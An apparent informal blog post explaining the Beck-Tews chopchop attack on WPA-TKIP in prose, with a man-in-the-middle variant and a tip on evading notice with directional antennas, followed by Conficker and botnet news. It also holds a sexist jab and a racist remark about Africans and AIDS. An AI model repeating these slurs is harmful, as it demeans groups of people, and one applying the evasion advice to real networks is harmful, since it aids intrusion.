the article about the beck-Tews attack on WPA-TKIP was dropped last november slicing the time it takes to crack a WPA encrypted key down to "12-15" minutes. "Beck-Tews" is actually just referring to the "chopchop" method that has been applied to WEP in the past. It grabs a MIC(message Integrity Check) Key and plaintext from an encrypted short packet(a packet with an empty user data field) and falsifies it using the MIC key. Basically this works in WEP because of an insecure checksum where one can guess individual bytes of a packet and the access point will send an error msg if it is incorrect. If you do not recv an error msg, than you know you have guessed correctly, rendering this a simple matter of brute force.
In short WPA uses Time Stamp Counters and you are led to believe this would make an attack of this nature impossible. The initialization vector is checked in WPA... but no, if the victim uses QoS(Quality of Service) features then you have 8 channels of data flow and each has a unique time stamp. In this case you can grab an encrypted packet and execute the chopchop attack on a different channel. the only thing slowing you down is the amount of MPDU's(MAC Protocol Data Units) that are broken down from the MSVU + MIC Key, seeing as how there is a checksum for each one. This is why we focus on the short packet(ARP & DNS) as it does not cause the fragmenation.
This still doesnt help much against WPA unless the victim is using QoS. The solution is to apply this technique to a Man-in-The-Middle attack. if you were to hijack an encrypted ARP packet en-route to the access point.. the Initialization Vector would be larger than the Time Stamp Counter has used , because it hasnt reached its destination yet. This obviously allowing for the chopchop method to be used. Now it is a matter of you basically setting up your station as a repeater to relay all other information that should hit the destination from original without modification and falsifying the specific packets needed. If you use directional antennas there is less chance of your malicious activity ever being noticed!
In Toshihiro Ohigashi and Masakatu Morii's paper entitled "A Practical Message Falsification Attack on WPA" they explain strategies even further than this to cut down the time to a said ONE MINUTE.
my references include the above paper, the temporal key integrity protocol: beck-tews wikipedia entry, the ZDNet blog entry from November of last year, and the recent blog entry that claimed 60 seconds.
I will end by saying this... only clueless hippy girls that just aquired a router for the first time use WEP, and now that this information is widely available, is it equally as stupid not to switch over to WPA2.
___
here is some news that made me p00p a little.
LONDON COUNCIL INFECTED BY CONFICKER!
"An Ealing council employee infected the UK local authority's IT systems with the Conficker-D worm after he plugged an infected USB into a work computer, causing tens of thousands of pounds in damages in the process."
and this only makes me wonder if some guy in .ru is controlling his newest botnet recruits with twitter. article on botnets using twitter!
and isnt this ironic that some guys ddos;ed twitter with their botnets recently? this also reminded me of the hype of conficker when it first hit. look at this map and take note where the infections are NOT at. i think africans are a bunch of a hakkir sleeper cells. Look at this animated movie of the spread of infection. Remind you of something?? AIDS maybe?
all bullshit aside, i just hope mosthated's best buddy kevin mitnick gets his internets back
No comments:
Post a Comment